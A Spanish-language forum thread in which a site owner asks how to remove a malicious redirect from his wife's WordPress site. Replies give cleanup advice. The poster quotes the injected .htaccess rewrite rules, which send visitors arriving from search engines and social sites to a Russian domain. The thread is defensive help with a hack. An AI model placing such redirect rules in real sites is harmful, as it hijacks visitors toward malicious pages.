Cómo eliminar el virus de redirección en mi sitio web

  • Autor Autor yonatan26
  • Fecha de inicio Fecha de inicio

yonatan26

Iota
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
La web de mi esposa esta infectada por un virus que solo redirecciona a otra web.... no tengo acceso al wp-admin (sale no encontrado) y solo al CPANEL entraa...

error 404 🙂

¿Como quito esa redirección para que este como antes? Del Cpanel? Ftp?
Ayudenme porfis ya que no quiero perder otra web por culpa de un virus.
 
Última edición:
Mira el fichero .htaccess. Si no sabes que hacerle, ponlo aqui.
 
Eliminá el archivo .htaccess que hace que redireccione la web.
Pero antes hacele un backup por las dudas.

Salu2!
 
sino me equivoco ese archivo .htaccess se accese por ftp?
 
Sí, si no lo vez y utilizas filezilla clicka en "Servidor -> Forzar mostrar archivos ocultos"
 
jonay dijo:
Sí, si no lo vez y utilizas filezilla clicka en "Servidor -> Forzar mostrar archivos ocultos"
Hacer clic para expandir...
Se agradece.. ahora mismo lo hago.. si no lo soluciono les aviso para ver otras opciones

- - - Actualizado - - -

Elimine el archivo .htaccess y esto fue lo que contenìa:

<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L] </IfModule>

RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]


¿Pero sigue redireccionandose o hay que esperar algo de tiempo?
 
Yo lo que haría sería bajar todos los archivos del ftp a tu pc... abrir el dreamweaver, pestaña edicion -> buscar y reemplazar, en buscar en selecciona carpeta y pon la carpeta donde bajastes los archivos, en buscar selecciona codigo fuente y la palabra a buscar htttp://reltime2012.ru por último clicka en 'buscar sig'.

El dreamweaver automáticamente te buscará todos lso archivos que contienen esa url y solamente tendrás que eliminarla de los archivos que lo tengan... el notepad++ también lo hace pero no recuerdo bien las pestañas.

Notepad++ Home
 
Con Wordfence puedes limpiar los archivos de wordpress, te permite restaurar los archivos originales y te avisa de los que están infectados, pero en la configuración tienes que activar que escanee también los archivos exteriores (está desactivado por defecto), la versión gratuita no comprueba el theme...

Enlace eliminado
 
no conozco ni manejo mucho el tema, pero uno de mis sitios tiene este archivo .htaccess

Insertar CODE, HTML o PHP: 
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /wp/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /wp/index.php [L]
</IfModule>

# END WordPress
 
cuando modificas algo en .htaccess los cambios son inmediatos asi que verifica si lo has eliminado si se vuelve a crear y con las mismas sentencias lo que haria pensar que hay algun script que lo esta ejecutando e intenta cambiar la contraseña a el wordpress y verifica si se han creado nuevos usuarios y ademas tambien actualiza la ultima version del wordpress antes claro has una copis de seguridad o baja los archivos via ftp
 
as un backup otra cosa... cuidado con este tipo de redirecciones y yo que tu no entraba a donde se redirecciona porque? se toman varios sitios (wordpress,joomla) los mas vulnerables y se toman estos servidores agenos (en este caso el tuyo) para conseguir bots (zoombies) con las cuales cada vez que se acceda se puede quedar infectado.

Como buen Hijo de las pruebas que soy aqui te dejo problemas similares con el mismo website: Enlace eliminado
y para colmo no sea culpa tuya ni de tu mujer... sino de algun otro usuario o de el mismo shared me dices mentiroso si la ip de el shared es 74.63.193.171 y ya a mediados de el 2011 la habian hackeado... (rooteado) u similares, lo que te aconsejo esque generes un backup como lo retrate anteriormente, antes de que afrontes hoy o despuues estos llamados (mass defacement) que lo que hacen es cambiar tu index por uno de (0wned) u similares.
aqui una imagen de la intrusion Lado derecho se admira la ip donde estas alojado.

Enlace eliminado

Cambiate de host... puede que hasta la base de datos de los usuarios que se registran se la roben para generar spam y robar credenciales suerte :encouragement:.
 

Osea en pocas palabras fue otra la web que estuvo alojada en el mismo servidor?...
porque y ahì tengo mi red de blogs y solo este esta asì
 
moisesluis dijo:
Osea en pocas palabras fue otra la web que estuvo alojada en el mismo servidor?...
porque y ahì tengo mi red de blogs y solo este esta asì
Hacer clic para expandir...

Todos los shared hosting's son vulerables con el solo tener acceso a uno de ellos se puede tener acceso a todos, esto ocurre por varios factores como desactualizacion de el kernel, posibles 0Days (vulnerabilidades que se descubren el mismo Dia y son atacadas masivamente),elevacion de privilegios arbitrariamente, bruteforce (fuerza bruta).
la ultima puede ser que sea la menos peligrosa (dependiendo de el diccionario) yo te aconsejaria que hables con tus proveedores o migres a otro web hosting mas confiable y "seguro" posiblemente que sea mas serio... que suspendan cuenta si huelen malware y no dejen montar nada ilegal en sus servidores No solo esto te puede afectar en la intrusion a los datos de tus sitios webs sino que puede verse tu sitio web como No confiable.
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

Sitio web infectado con virus o redireccionamiento a otro sitio
2
Respuestas
26
Visitas
586
Nikkygeek
¿Cómo eliminar un virus de mi página web?
Respuestas
8
Visitas
347
Accesito
Tutorial: Cómo eliminar virus de Wordpress con Wordfence Premium de forma sencilla
2
Respuestas
26
Visitas
3K
seoconjuntas
I
Cómo eliminar el virus del acceso directo de tu pendrive sin perder la informacion
Respuestas
1
Visitas
353
BotBeta
  • Cerrado
¿Cómo eliminar un virus de mi página web?
Respuestas
15
Visitas
1K
Sagi159
Menú
Acceder
Registro